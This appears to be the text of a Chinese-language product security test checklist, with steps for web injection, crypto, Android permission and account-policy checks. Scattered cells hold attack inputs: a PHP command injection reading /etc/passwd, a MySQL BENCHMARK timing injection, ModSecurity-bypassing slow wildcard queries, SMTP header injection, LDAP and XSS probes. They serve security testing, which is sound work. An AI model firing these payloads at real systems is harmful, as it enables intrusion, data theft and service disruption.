例外：当BS页面口令处于编辑状态下，允许源文件中存在该正在编辑的口令，编辑前后的源文件则不允许有明文口令。</t>
  </si>
  <si>
    <t>1.进入Web系统；
2.业务状态迁移需要有约束条件，绕过约束条件进行业务迁移。如删除用户无法恢复，可构造恢复消息直接恢复用户。
测试思路：主要分析状态迁移的逆向操作，根据业务场景设计，如果可以逆向操作，则存在问题。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.系统中存在业务处理需要经过多个步骤完成，如经过多次验证才可以操作某业务。</t>
  </si>
  <si>
    <t>在.PHP页面的URL后追加一个分号以及一个OS命令，就能执行该命令。
例：http://sensitive/something.php?dir=%3Bcat%20/etc/passwd
注：通常PHP语言的命令注入集中在system/exec/passthru/Shell_exec/``运算符五种函数情况，可以通过查看源码分析过滤原则</t>
  </si>
  <si>
    <t>1.应用运行正常
2.系统使用Perl实现</t>
  </si>
  <si>
    <t>1.进入系统，进入应用的查询部件输入以下查询条件，如果应用使用了比平时多的时间来反应，说明这是一个漏洞。
   a.'%_[^!_%/%a?F%_D)_(F%)_%([)({}%){()}￡$&amp;N%_)$*￡()$*R"_)][%](%[x])%a][$*"￡$-9]_%'
   b. '%64_[^!_%65/%aa?F%64_D)_(F%64)_%36([)({}%33){()}￡$&amp;N%55_)$*￡()$*R"_)][%55](%66[x])%ba][$*"￡$-9]_%54' bypasses
modsecurity
   c._[r/a)_ _(r/b)_ _(r-d)_
   d. %n[^n]y[^j]l[^k]d[^l]h[^z]t[^k]b[^q]t[^q][^n]!%
   e.%_[aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa[! -z]@$!_%
注意：以 % 开始，以 % 结尾通常能让查询运行更久。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.系统使用数据库进行数据存储
3.系统存在前台输入条件在后端数据进行操作的功能。</t>
  </si>
  <si>
    <t>1.登录系统，发送业务请求
2.拦截请求消息，修改请求消息当中携带的资源信息，或者管理员信息，并提交到服务器。
3.返回结果是否可以查询到相应的内容，如果返回相应内容则测试不通过。如果提示错误信息则通过验证。</t>
  </si>
  <si>
    <t>1.访问带有验证码的页面；
2.右键点击验证码，查看弹出的右键菜单是否包括“图像另存为”或者“图片另存为”的选项；如果存在，则说明验证码是图片，另存图像到本地磁盘上；
3.打开另存的图像，检查其中的验证码是否步骤1看到的验证码一样，且为非BMP图像格式。</t>
  </si>
  <si>
    <t>1.使用用户、口令登陆系统
2.进入口令修改页面
3.在新口令输入框中输入简单口令，如纯字母，纯数字，或字母加数字组合，或长度小于6位等。
备注：简单口令有多种形式，如口令与用户名相同，或为用户名的逆序；不包含特殊字符。</t>
  </si>
  <si>
    <t>1、CodeCC扫描和人工代码走读均没有发现SSL/TLS的算法套件在使用时应用了RC4算法选项；
2、Nmap加载加密算法插件也没有扫描相关的问题，说明安全； 
3、在流加密场景下，除标准算法规定以外，在工具扫描没有相关的风险提示，在人工走读也没有发现使用CTR模式，而是使用的OFB模式，说明安全；</t>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1）、3DES的密钥长度是否达到128bit
   2）、在3DES如果使用的192bit的密钥长度，则密钥的前64bit、中间64bit、后面64bit的数据禁止存在重复现象
   3）、3DES的三次密钥K1、K2、K3不能相等；</t>
  </si>
  <si>
    <t>目的和意义：
分组密码的CBC模式可以确保相同的明文、相同的密钥（搭配每次都不同的IV），产生的密文也各不相同。确保攻击者无法通过分析密文获得明文的任何信息，有效抵抗选择明文攻击、防止密文被解密或替换。ECB模式无法抵抗上述密码攻击。
子检查项：
1、Openssl里的对称算法标识（如：EVP_aes_128_ecb()），禁止包含"ecb"字样
2、iPSI里的对称算法标识（如：ALGID_AES256_ECB()），禁止包含"ecb"字样
3、Java里Cipher.getInstance("AES")，其中"AES"默认是ECB模式，应禁止使用
4、Java里Cipher.getInstance("AES/ECB/NoPadding")，禁止包含"ecb"字样</t>
  </si>
  <si>
    <t>1、查看产品资料，看证书管理部分是否有证书及公私密钥对替换方法的说明和风险提示。
2、登陆设备，访问设备所使用的证书和密钥对，看是否有对应操作或命令，可以重新生成密钥对、申请证书，或导入证书和密钥对。
另外，私钥属于敏感信息，在系统中应该加密保存，并提供严格的访问控制机制。</t>
  </si>
  <si>
    <t>1、获取产品资料。
2、产品出厂预置华为证书，产品环境可用。</t>
  </si>
  <si>
    <t>检查密钥的使用是否符合以下要求：
1、同一笔业务中，若既需要加密运算也需要计算MAC，则加密操作和计算MAC操作不允许使用同一个对称密钥
2、同一笔业务中，若既需要使用非对称加密又需要进行数字签名，则加密使用的公钥和签名使用的私钥不允许来自同一个密钥对或同一个数字证书</t>
  </si>
  <si>
    <t>1、密钥协商过程使用身份认证机制保护
2、有SSL/TLS业务通信过程或能获取到系统中使用SSL通信的源代码</t>
  </si>
  <si>
    <t>和工信部的杨正军主任对签名的要求确认：
1）工信部只检查姓名（CN）、部门(OU)、公司(O)名称三项的有效性，其他字段为空或者无效不检查
举例：  ireader读书应用签名信息CN=Zhang Chao, OU=iReader, O=iReader, L=Beijing, ST=Beijing, C=Unknown-------合格，部门有效，C=Unknown不要求。
2）姓名、部门、公司名称只要有一项可以真实体现应用开发公司（只要填写的信息中包含了开发公司名称，网址形式也是可以的），则认为合理。
举例：大众点评应用签名OU=dianping.com, O=dianping.com----------合格，可以明显识别出开发公司是点评。
3)应用为a，被b公司收购后，签名改成了b，这种应用名称跟签名对不上的情况只要第三方给出书面说明即可。
举例：天天动听被阿里巴巴收购了，apk名称是天天动听，签名信息是阿里巴巴，这个时候需要把问题提出来，请严瀚斌他们提前找第三方公司要个书面材料，说明apk签名变更原因，到时候提交应用报备材料的时候在apk后面备注下，告知工信部也是合理的</t>
  </si>
  <si>
    <t>1、用户协议有联网权限的说明。在用户协议界面，用户没有点击确认之前，LBE没有提示应用联网
2、LBE不会弹出提示联网</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</si>
  <si>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4、放置15分钟，在其间进行灭屏亮屏、休眠唤醒、网络断开再连接等操作，观察LBE是否可以检测出后台联网行为</t>
  </si>
  <si>
    <t>1、手机恢复出厂设置或者升级后第一次开机
2、LBE对开启移动网络进行监控
3、移动网络开关、WIFI开关和蓝牙开关默认关闭</t>
  </si>
  <si>
    <t>1、桌面launcher类app读取通话记录无需提醒
2、该行为对应权限android.permission.READ_CALL_LOG</t>
  </si>
  <si>
    <t>1、应用会发送注册短信
2、LBE对后台发送短信行为进行监控</t>
  </si>
  <si>
    <t>1、wlan网络和数据网络未开启
2、SIM卡不在位
3、应用包含用户协议界面</t>
  </si>
  <si>
    <t>1、应用在LBE弹框提示之前，有用户协议界面或者单独弹框提示用户后台行为。
3、应用在LBE弹框提示之前，有用户协议界面或者单独弹框提示用户后台行为。</t>
  </si>
  <si>
    <t>1、长按桌面空白处，选择窗口小工具，长按待测试的应用的widget添加到桌面
2、点击widget,进入到应用，观察LBE是否可以检测到敏感权限</t>
  </si>
  <si>
    <t>1、系统提示该帐号或IP已被锁定。
注：如果已经通过验证码防止帐号口令的暴力破解，那么，不强制遵循本条要求。</t>
  </si>
  <si>
    <t>1、密钥分层管理可以提高密钥管理体系的安全性，防止密钥管理体系中一个密钥被攻破导致整个密钥管理体系的崩溃，避免密文数据全部被解密并泄露；
2、密钥分层管理可以减小密钥更新的开销；
3、密钥封层管理可以避免直接使用根密钥加密业务数据，大大减小攻击者使用各种密码分析手段获取根密钥的可能性，从根本上确保密码体系的安全性。
检查密钥使用和密钥管理是否符合要求：
1、禁止根密钥直接加密数据（如：网络传输的业务数据、用户口令、配置文件、数据库敏感字段等）、根密钥应该只被用作加密密钥（如：工作密钥），而由工作密钥加密数据；
2、应根据实际场景决定采用二层密钥管理结构或是三层密钥管理结构</t>
  </si>
  <si>
    <t>1、将备注中的附件拷贝到本地，用python执行
2、检查生成的d:\apkTest\cert.txt
3、检查生成的d:\apkTest\certDetails.txt</t>
  </si>
  <si>
    <t>1、病毒库更新到最新版本
2、杀毒软件不会报出存在病毒、木马、恶意程序等安全风险提示，扫描结束后扫描报告需要存档</t>
  </si>
  <si>
    <t>方法1：访谈确认客户端是否存在后台的接口，使得能够被远程控制，如访问用户本地文件、搜集用户信息等
方法2：通过nmap扫描端口并对比通信矩阵来比对确认是否存在后台端口使得能够被运程控制。</t>
  </si>
  <si>
    <t>1.测试每个提交给与电子邮箱功能有关功能的参数，尝试提交下述的字段，在相关位置插入电子邮箱地址：
（1）&lt;邮箱地址&gt;&lt;%0aCc&lt;邮箱地址&gt;
（2）&lt;邮箱地址&gt;&lt;%0d%0aCc&lt;邮箱地址&gt;
（3）&lt;邮箱地址&gt;&lt;%0aBcc&lt;邮箱地址&gt;
（4）&lt;邮箱地址&gt;&lt;%0d%0aBcc&lt;邮箱地址&gt;
（5）%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+&lt;邮箱地址&gt;%aRCPT+TO:+&lt;邮箱地址&gt;%0aDATA%0aFrom:+&lt;邮箱地址&gt;%0aTo:+&lt;邮箱地址&gt;%0aSubject:+test%0afoo%0a%2e%0a
（6）%0aDATA%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+&lt;邮箱地址&gt;%0d%aRCPT+TO:+&lt;邮箱地址&gt;%0d%0aDATA%0d%0aFrom:+&lt;邮箱地址&gt;%0d%0aTo:+&lt;邮箱地址&gt;%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a</t>
  </si>
  <si>
    <t>已知Web网站地址：http://www.example.com 或 IP：http://aa.bb.cc.dd
2.Web业务运行正常</t>
  </si>
  <si>
    <t>1、系统运行正常
2、系统提供恢复默认配置功能</t>
  </si>
  <si>
    <t>1、系统默认最多只提供一个超级管理员账号。
2、系统初始安装或首次登陆时，强制用户设置、修改超级管理员的口令。
3、超级管理员拥有业务系统所有的管理权限，用户不能更改。</t>
  </si>
  <si>
    <t>1、使用管理员账号登陆系统。
2、新建应用账号，填写所有相关信息（个人信息、认证信息等），并分配或关联多个程序执行权限。
3、删除此应用账号。
4、新建应用账号与之前删除的同名，所有非必选信息默认不填，新建成功后，查看此应用账号是否有相关信息继承了之前的账号。</t>
  </si>
  <si>
    <t>问题1（致命）：MDS 6600网络版（C/S架构）中，服务端对客户端用户的管理操作行为记录不全面：1) 用户登录系统、退出系统、强制其他在线用户下线、修改所属组等管理操作无日志记录。参看DTS2014082105460。
问题2（提示）：Linux系统/OMS账户被锁定，自动解锁操作无日志记录。具体示例如下：1.   使用putty登陆Linux系统，连续输入多次（建议10次以上）错误密码，账户使用正常登陆，无法正常登录系统。此后账户自动解锁，自动解锁未记录日志。2.   使用Admin登录eCNS610系统，连续输入多次错误密码，直至账户被锁定。此后账户自动解锁，自动解锁未记录日志。参看DTS2014091106032</t>
  </si>
  <si>
    <t>1.密钥和向量是随机生成的
2.随机数的生成使用的是安全随机数方法，不可以使用伪随机数</t>
  </si>
  <si>
    <t>1、系统不提供“自动登录/记住密码”功能。
2、如果有明确需求提供此功能，也要将该功能做成可配置，而且默认是关闭的。</t>
  </si>
  <si>
    <t>1、在系统启动界面中禁止存在隐藏的调试菜单
2、系统安装后须及时清理不必要的安装文件
3、系统中禁止含有网络嗅探工具tcpdump和口令破解工具，不建议有gdb调试工具,cpp、gcc等开发和编译工具
4、设备类产品禁止提供shell命令行</t>
  </si>
  <si>
    <t>1、是否对外暴露可以访问包含敏感信息（如备忘录内容、日历存储内容等）的接口
2、是否出于保障网络运营和服务目的提供采集最终用户原始通信内容
3、产品是否存在可修改任意用户口令的工具
4、产品是否存在对包含敏感数据的文件（如包含密钥的配置文件、数据库）进行解密的自研工具</t>
  </si>
  <si>
    <t>1、未经数据主体同意，数据控制者不允许私自收集其个人数据（如MSIDN、IMSI、IMEI、URL HOST、URI等）
2、数据控制者采集的个人数据必须在隐私声明里说明或是在收集之前通过弹出框告知数据主体
3、数据控制者必须向数据主体提供授权及撤销授权的机制</t>
  </si>
  <si>
    <t>1、查找应用程序存在口令输入框的界面/页面
2、在口令输入框中输入任意字符串
3、选择并复制口令输入框中的字符串
要分别测试操作员账号、最终用户账号、程序账号</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where Super_priv ='Y';”。
2.查询结果应该管理员用户。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.系统中存在状态迁移业务场景</t>
  </si>
  <si>
    <t>1.系统运行正常
2.系统使用PHP实现业务功能</t>
  </si>
  <si>
    <t>1.查询无法返回过多的结果。
2.前台是否返回LDAP查询错误信息，无LDAP错误信息，后台日志中无LDAP错误信息。</t>
  </si>
  <si>
    <t>利用BENCHMARK()函数，可以让同一个函数执行若干次，使得结果返回的时间比平时长；通过时间长短的变化，可以判断出注入语句是否执行成功。 
Eg.下面对针对id有注入点的一个timing attack攻击
id=11 UNION SELECT IF (SUBSTRING(current,1,1)=
CHAR(119),BENCHMARK(500000,ENCODE('MSG','BY 5 SECONDS')),NULL) FROM (SELECT DATABASE() as current) as tb1;
注：BENCHMARK(count, expr)函数——将表达式expr执行count次；其他数据库也有相对应的函数，如postgreSQL——PG_sleep（seconds）、MS SQL SERVER——waitfor delay‘second’等</t>
  </si>
  <si>
    <t>1.登录系统后，检查服务器的回答显示出在成功验证后 HTML 中返回给用户的隐藏字段。并修改指示管理权限字段
2.修改后检查是否拥有相应权限，修改后，发送超出本身权限范围外的业务请求</t>
  </si>
  <si>
    <t>1.系统运行正常
2.获取系统用户名密码，
3.设置不同权限的用户</t>
  </si>
  <si>
    <t>1.创建自动化脚本来与服务器建立很多会话（每个会话中缓存大量数据，比如从数据库中检索到的大量数据）；
2.让该脚本运行一段时间，然后检测应用程序对新的会话的反应程度。</t>
  </si>
  <si>
    <t>1.系统提供限制同时登录在线用户数的功能”可配置
2.同时在线用户数有效，超过同时在线用户限制时，其它用户无法登录。</t>
  </si>
  <si>
    <t>1.以管理员帐号登录系统；
2.进入系统登录配置管理或认证配置管理界面。
3.检查是否存在根据帐号、组、角色与 IP 地址、时间范围等进行组合来确定允许或拒绝会话建立的配置功能。</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知正常用户的用户、口令
3.用户口令可修改</t>
  </si>
  <si>
    <t>1.通过查看Web配置文件检查被测目标是否关闭DWR调试模式
   a.进入Web后台服务器
   b.进入Web服务部署目录，使用find命令找到Web.xml配置文件
   c.检查该Web.xml中dwr对应debug值是否为false：
&lt;servlet&gt;
  &lt;servlet-name&gt;dwr-invoker&lt;/servlet-name&gt;
  &lt;servlet-class&gt;org.directWebremoting.servlet.DwrServlet&lt;/servlet-class&gt;
  &lt;init-param&gt;
    &lt;param-name&gt;debug&lt;/param-name&gt;
    &lt;param-value&gt;true&lt;/param-value&gt;
  &lt;/init-param&gt;
  &lt;load-on-startup&gt;11&lt;/load-on-startup&gt;
&lt;/servlet&gt;
&lt;servlet-mapping&gt;
 &lt;servlet-name&gt;dwr-invoker&lt;/servlet-name&gt;
 &lt;url-pattern&gt;/dwr/*&lt;/url-pattern&gt;
&lt;/servlet-mapping&gt;
2.通过访问Web系统DWR调试页面检查被测目标是否关闭DWR调试模式
   a.访问http://www.example.com[/YOUR-WebAPP]/dwr/，观察是否可以访问</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.系统采用了STRUTS2开源框架
3.拥有Web服务器操作系统的帐号和口令
4.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.已知日志查询URL，假设为http://www.exmaple.com/page.xxx</t>
  </si>
  <si>
    <t>1.三个文件的属性中，“连接到”这一项的内容，均为"/dev/null"
注：这几个文件，都是不允许在系统上存在的。如非必要，这几个文件实际应在系统上删除。</t>
  </si>
  <si>
    <t>业界标准 (DT)Req 3.01-17 预定义的验证属性必须被删除或禁用。
Predefined authentication attributes must be deleted or disabled.</t>
  </si>
  <si>
    <t>1、CodeCC扫描和人工代码走读均没有发现RSA_generate_key第2个参数为3，说明安全；
2、Nmap加载加密算法插件也没有扫描相关的问题，说明安全；</t>
  </si>
  <si>
    <t>1、工具使用：
   1）使用CodeCC中的Fortify和Coverity，能扫出部分加密算法问题的代码；
   2）使用Nmap调用加密算法的套件，能扫出部分加密算法的问题；
2、人工代码走读：
   1)、禁止在SSL/TLS里使用包含RC4的算法套件
   2)、在需要使用流加密的场景下是否使用AES的OFB和CTR模式替换（标准协议规定的除外，如：3GPP的A5算法除外）</t>
  </si>
  <si>
    <t>目的和意义：
CBC模式的随机IV值确保相同的明文、相同的密钥加密出的密文完全不同，如果IV无法确保每次加密都不同，对于CBC模式，攻击者可以轻易的进行密文替换攻击；CBC模式之外的其他分组密码运算模式（如：OFB、CRT等），攻击者可以非常容易的解密密文。
CBC模式之外的其他分组密码运算模式（如：OFB、CRT等）的随机IV值用于抵抗密钥流重用（已知明文攻击的一种），防止攻击者解密密文。
子检查项：
1、IV是否是安全随机数
2、IV不能固定（如：写死在代码里）
3、禁止使用前一次加密的最后一个密文分组数据作为下一次加密的IV（这是针对TLS 1.0的BEAST攻击的根因）
4、IV不能写在配置文件里，且每次加密后都应更新
5、IV不能使用某些固定属性，如：某些ID</t>
  </si>
  <si>
    <t>1、查看产品文档中的证书及密钥管理章节，检查私钥的存储方式是否按照PKCS标准加密存储。
（如果产品不支持基于口令的私钥存储机制，则直接跳到第4步）
2、登陆设备，尝试生成或导入密钥对功能，检查是否需要设定保护口令，且输入的口令是否有复杂度检查。
3、尝试修改私钥保护口令，检查修改时是否需要验证旧口令。
4、检查产品源码中涉及私钥生成、导入及存储的部分，分析上述验证的功能是否存在及使用正确性。
备注：开源或第三方软件实现的基于口令的加密私钥功能，其口令不强制要求复杂度检查。</t>
  </si>
  <si>
    <t>密码安全是基于密钥安全的， 如果密钥不可更新，攻击者可以在收集足够的“明密文对”后使用成熟的密码分析技术大大降低猜测密钥的难度，最终获取密钥，解密密文。
检查密钥更新是否符合以下要求：
1、工作密钥禁止硬编码，硬编码在可执行程序里的密钥无法更新（版本更新不视为密钥更新的方法）
2、系统设计和功能里设计和支持了密钥更新方法（密钥更新方式：手动更新、自动更新等），并规定了密钥更新规则（在线更新、离线更新、更新时间等）</t>
  </si>
  <si>
    <t>1、系统中使用密钥
2、能获取到源代码</t>
  </si>
  <si>
    <t>产品对外发布资料中配套提供通信矩阵，通信矩阵记录如下信息：通信使用的端口、协议、IP地址、认证方式、端口用途信息等。
通信矩阵每一列都描述正确。</t>
  </si>
  <si>
    <t>1、自研应用的测试结果在error-huaweiApks.txt里面，包含三类错误信息：（1）重复申请的权限——即一个应用申请了重复的权限（AndroidManifest中有完全一致的字符串），一般都需要提单处理。这个不属于红线问题，但对续应用的维护有影响，建议都要解决。（2）应用有申请但不在总表中的权限——这里的总表指《安全红线测试--各个apk的权限申请总表.xlsx》。这里有可能是应用有新申请的正常权限但表格没有更新，也有可能是非必要权限。需要按应用的功能需要挨个确认是否是问题，或者要补充进总表。（3）总表中有但应用没有申请的权限——需要按应用的功能需要挨个确认是否是问题，或者要更新总表
2、三方应用的测试结果在error-thirdPartyApks.txt里面，包含三类错误信息：（1）重复申请的权限——同上。（2）应用申请了敏感权限——这里的"敏感权限"的标准是：
《AndroidPermissions.xlsx》中的SensitivePermissions表格中保护级别为dangerous或normal的权限。对每一个敏感权限，需要 应用开发/供应商 详细说明理由。（3）应用申请了系统级权限——这里的"系统级权限"的标准是：当前被测设备中导出的所有级别为signature或system的权限（导出方法：adb shell pm list permissions -g -f）
一般不允许三方应用申请系统级的权限，如果有申请，可以认为有恶意应用的嫌疑（权限提升等嫌疑），请直接提单。
注：如果当前没有合适的Android设备，也可用已经导出来的系统权限表格来测试，方法是：将check_perm.py中开头部分的 sysPermSouce = "device"  改成  sysPermSouce = "file"。这样配置后，脚本会从《AndroidPermissions.xlsx》中的AllSystemPermissions 表格来获取权限。</t>
  </si>
  <si>
    <t>1、进入应用，检查用户协议界面对联网权限的说明
2、用户协议点击确定，进入本地界面</t>
  </si>
  <si>
    <t>1、检查LBE是否提示应用后台读取通话记录。如无提示，则测试通过。如有提示，需检查在LBE提示前，应用本身是否事前提示用户后台读取通话记录（可以通过弹框的方式或者在用户协议中声明）。如无提示则测试fail
3、如果应用真正退出，则测试通过
4、LBE不会弹出后台读取通话记录提示</t>
  </si>
  <si>
    <t>1、进入应用，使用注册功能，填写信息注册并提交
2、收到验证码后，检查自动填充验证码前，应用是否明示用户读取短信行为</t>
  </si>
  <si>
    <t>1、应用支持短信支付游戏币等功能
2、LBE对后台发送短信行为进行监控</t>
  </si>
  <si>
    <t>1、桌面launcher类app读取联系人无需提醒
2、该行为对应权限android.permission.READ_CONTACTS；</t>
  </si>
  <si>
    <t>1、从其他应用入口调用应用，查看在LBE检测出后台行为前，是否明示用户。
2、正常进入应用，在用户协议中不勾选“不再提醒”，正常遍历功能后退出。
3、再次从其他应用入口调用应用，查看在LBE检测出后台行为前，是否明示用户。</t>
  </si>
  <si>
    <t>1、应用自带widget
2、使用LBE监控应用的后台行为
3、应用没有从正常入口打开过，或者在设置中清除了应用数据</t>
  </si>
  <si>
    <t>预置条件：
1、系统提供“连续登录失败锁定”功能；
测试步骤：
1、连续N次使用错误的口令登录使帐号锁定（N&lt;10）；
2、关闭客户端，并清除客户端所有本地记录（如历史记录等等）；或者使用该账号在另外一台手机登陆
3、再次打开客户端，使用步骤1中的帐号正确的口令登录应用系统</t>
  </si>
  <si>
    <t>1、口令不能被复制，例如：
（1）没有复制菜单
（2）提示口令不能被复制
2、粘贴的时候，不能粘贴出口令信息
说明：这里指的是不能从口令输入框“拷出”数据，能否“拷入”（粘贴）是不限制的。</t>
  </si>
  <si>
    <t>1、系统检测到有新版本，
2、应用检测到有新版本</t>
  </si>
  <si>
    <t>2、cert.txt文件开头的异常信息为空（有四类可能的异常信息：framework-res.apk没有采用华为签名；特殊的GMS APK没有采用华为签名；包含没有签名的PAK；包含采用了debug签名的APK），遇到异常信息要分别提单
3、姓名、部门或公司名称这三项中需保证至少有一项不为空，且需保证所填信息真实有效，不能为网址、乱码等无效信息。（且对于非谷歌官方的应用，不得采用Android公开证书，即出现类似这些信息：Android/emailAddress=android@android.com）</t>
  </si>
  <si>
    <t>1.通过访谈获取开发常用账号定义关键字，收集产品常用账号；
2.反编译apk软件包，获得源代码；
3.打开Search and Replace，使用步骤1中的关键字搜索代码，根据搜索结果分析是否存在硬编码账号；</t>
  </si>
  <si>
    <t>1.手动浏览应用程序，并修改每一个URL参数，在其中插入一个标准的测试字符串，例如：“&lt;script&gt;alert(1)&lt;/script&gt;”、alert(1)//、‘-alert(1)-’等。
2.检测页面的JavaScript，查看其中是否使用了任何可能导致漏洞的DOM属性。例如：可以用户访问的专门设计的URL控制的数据输入点document URL和输出点document.write()等。
3.针对每个可疑点，根据用户可控制的字符串插入点前后已经存在的语法，编码及调整输入，尝试触发DOM型XSS漏洞。</t>
  </si>
  <si>
    <t>检查数据库的运行权限是否为超级管理员（system/administrator），检查方法如下：
1.打开SQL企业管理器；
2.选中“local”，右键属性，选择“安全性”选项；
3.查看“启动服务帐户”，在下面的帐户中启动并运行SQL Server，如果是"系统帐户"，说明存在问题。</t>
  </si>
  <si>
    <t>满足以下条件之一：
1.不存在用户名口令验证码以外的字段；
2.存在的非用户名口令验证码以外的字段不会影响服务器认证：无论删除或是修改这些字段都不会影响服务器认证。</t>
  </si>
  <si>
    <t>1、查看产品文档，看系统是否支持超级管理员功能，且是否仅有一个超级管理员账号。
2、使用超级管理员账号登陆，看首次登陆时，是否强制修改口令。
3、使用普通用户或普通管理员用户登陆系统，看能否修改超级管理员的管理权限。</t>
  </si>
  <si>
    <t>1、登陆设备，实际操作，完成预共享密钥认证过程。打开debug开关，收集调试信息，分析认证过程，看预共享密钥是否直接用于身份认证或信息加密。
2、查看源码，结合对开发人员的访谈，分析加密密钥及认证密钥的生成过程。</t>
  </si>
  <si>
    <t>1、对于数据控制者和处理者，必须根据个人数据的使用目的以及法律要求给个人数据定义存留期
2、对于数据控制者和处理者，超过存留期后，必须提供机制或是指导来删除或匿名化个人数据
3、对于数据控制者和处理者，产品运行期间临时产生的包含个人数据的文件，产品运行结束后必须自动删除或匿名化其中的个人数据
4、WIFI直连应用中，导入联系人时不得将联系人信息明文永久暴露在SD卡存储区</t>
  </si>
  <si>
    <t>问题1（一般）： 1）将NodeB内置私钥文件“key.pem”名称修改成“NodeBCfg.XML”，并放置在配置文件默认路径下；2） 执行“ULD CFGFILE”命令，下载“NodeBCfg.XML”文件成功；3）下载的“NodeBCfg.XML”实际是“key.pem”文件。4） 附件为下载的私钥文件 key.pem。
问题2（一般）：可以通过ftp导出设备证书的私钥。
问题4（一般）：按照产品联机帮助手册中描述，可以从网管服务器的预置证书（p12格式）导出该预置证书私钥：按照描述导出的华为预置证书私钥是未加密格式的，通过工具可以查看到私钥的全部明文内容。</t>
  </si>
  <si>
    <t>1、登陆之前，系统提供的信息仅与登陆有关，不涉及任何系统敏感信息。
2、登陆之后，有账号登陆信息提示，使用户可以了解该账号登陆情况，及时发现安全问题。
3、用户从管理面登录成功后，最好提供警示信息给用户，且警示信息内容及显示开关可配置。</t>
  </si>
  <si>
    <t>1、访问系统登陆页面。
2、看是否有“自动登录/记住密码”选项（记住用户名/账号不算）。
3、如果存在，则查看此功能是否可配置，是否默认开启/选中。</t>
  </si>
  <si>
    <t>1、WIFI直连建立后，若WLAN的安全类型默认为WPA/WPA2-PSK模式，则当用户使用过时的安全协议（如wep）时，需要在显示界面或CPI资料提示风险
2、在应用程序中，配置不安全算法时应在显示界面或CPI资料提示安全风险
3、在应用程序中，开启ftp或telnet服务时应在显示界面或CPI资料给出风险提示</t>
  </si>
  <si>
    <t>1、在系统启动界面中是否存在隐藏的调试菜单
2、系统安装后是否及时清理不必要的安装文件
4、设备类产品是否提供shell命令行</t>
  </si>
  <si>
    <t>1、产品或服务不允许收集隐私声明中没有列出的个人数据，不允许将个人数据用于没有声明的目的
2、个人数据的采集范围、使用目必须与隐私声明中的描述保持一致</t>
  </si>
  <si>
    <t>1、未经数据主体同意，数据控制者私自收集其个人数据（如MSIDN、IMSI、IMEI、URL HOST、URI等）
2、数据控制者采集的个人数据是否在隐私声明里说明或是在收集之前通过弹出框告知数据主体
3、数据控制者是否向数据主体提供授权及撤销授权的机制</t>
  </si>
  <si>
    <t>1、终端应用程序不能申请了不需要的权限，如：
  1) 手电筒应用申请了读取电话簿的权限
  2) 输入法申请了录音权限或摄像头的权限</t>
  </si>
  <si>
    <t>首先通过任务管理器启动mysql服务，命令行进入mysql安装目录下的bin目录，执行以下命令：
windows：mysql -u用户名 -p密码
linux：./mysql -u用户名 -p密码
1.在mysql命令行下执行“select user from mysql.user where Shutdown_priv ='Y';”。
2.查询结果应该为管理员用户。</t>
  </si>
  <si>
    <t>1.系统正常运行
2.WEB界面可以查看浏览文件如PDF,DOC，TXT等文件</t>
  </si>
  <si>
    <t>1.进入系统，尝试仅输入*字符作为搜索项，如返回大量的结果，则可能存在LDAP注入。
比如：
搜索过滤器（查询功能），假设有一个使用下列搜索过滤器的 Web 应用程序：
searchfilter="(cn="+user+")"
执行下面的HTTP请求：http://www.example.com/ldapsearch?user=John，如果 'John' 的值通过发送请求替换为一个 '*' ：http://www.example.com/ldapsearch?user=*
该过滤器将如下所示：
searchfilter="(cn=*)"
2.可以尝试插入 '(' 、 ' | ' 、 '&amp;' 、 ' * ' 和其他字符的错误做法查看应用程序的错误。</t>
  </si>
  <si>
    <t>1.系统运行正常
2.存在输入条件</t>
  </si>
  <si>
    <t>1.以管理员帐号登录系统；
2.进入系统登录配置管理或认证配置管理界面。
3.配置系统同时在线用户数的功能。设置同时在线用户数为2。
4.对同时在线用户数功能进行验证，同时登录2个用户后，再登录第三个用户。</t>
  </si>
  <si>
    <t>1.双击DWRDigger图标，启动DWRDigger工具。
2.点击“导入”按钮，选择要测试DWR对应的dwr.xml文件。（可以通过产品安装包，或者直接登录Web服务器，获取dwr.xml文件。）
3.配置Web应用对应的URL（形式：http://IP:端口/[Webapp]，或者http://域名/[Webapp]），例如：http://10.70.170.175:8080/tellin。
4.点击“DWR类”框中的类，自动获取DWR方法列表
5.点击“DWR方法”框中的方法，自动获取DWR方法对应的参数列表
6.在“输入参数和值”框中填写输入参数值，然后点击“调用”按钮
7.在“返回结果”框中查看调用的返回结果。
备注：
1.如果了网站开启了DWR的Debug功能（通过IE可以访问到其dwr/index.html页面），则可以在Web应用URL中输入dwr/index.html对应的URL（例如：http://10.70.170.175:8080/dwr/index.html）。这时候，就不需要导入dwr.xml文件了。
2.如果需要测试Internet上的DWR类，在确保IE连接Internet的代理配置正确的情况下，点击选择“使用IE代理”。
3.如果测试的DWR类有会话管理机制，则通过代理工具获取会话标识及值，并在Cookie中配置会话标识及值，例如：JSESSIONID=0599F4FC3E64C7C673D27F296AA1450D</t>
  </si>
  <si>
    <t>1.Web业务运行正常
2.系统采用了DWR开源框架
3.拥有Web服务器操作系统的帐号和口令
4.已知Web容器的部署，配置目录</t>
  </si>
  <si>
    <t>1.使用浏览器（IE/FIREFOX）打开应用服务地址；
2.打开SSL证书，检查如下信息，包括确定证书有效期： 
  a.检查认证机构（ CA ）是否已知（意思是一个值得信赖的）
  b.检查该证书目前未过期
  c.检查网站的名称是否与证书中报告的相符</t>
  </si>
  <si>
    <t>业界标准 (CIS)9.2.1 Set SSH Protocol to 2 (Scored)/
9.2.3 Set Permissions on /etc/ssh/sshd_config (Scored)/
9.2.5 Set SSH MaxAuthTries to 4 or Less (Scored))/
9.2.6 Set SSH IgnoreRhosts to Yes (Scored)/
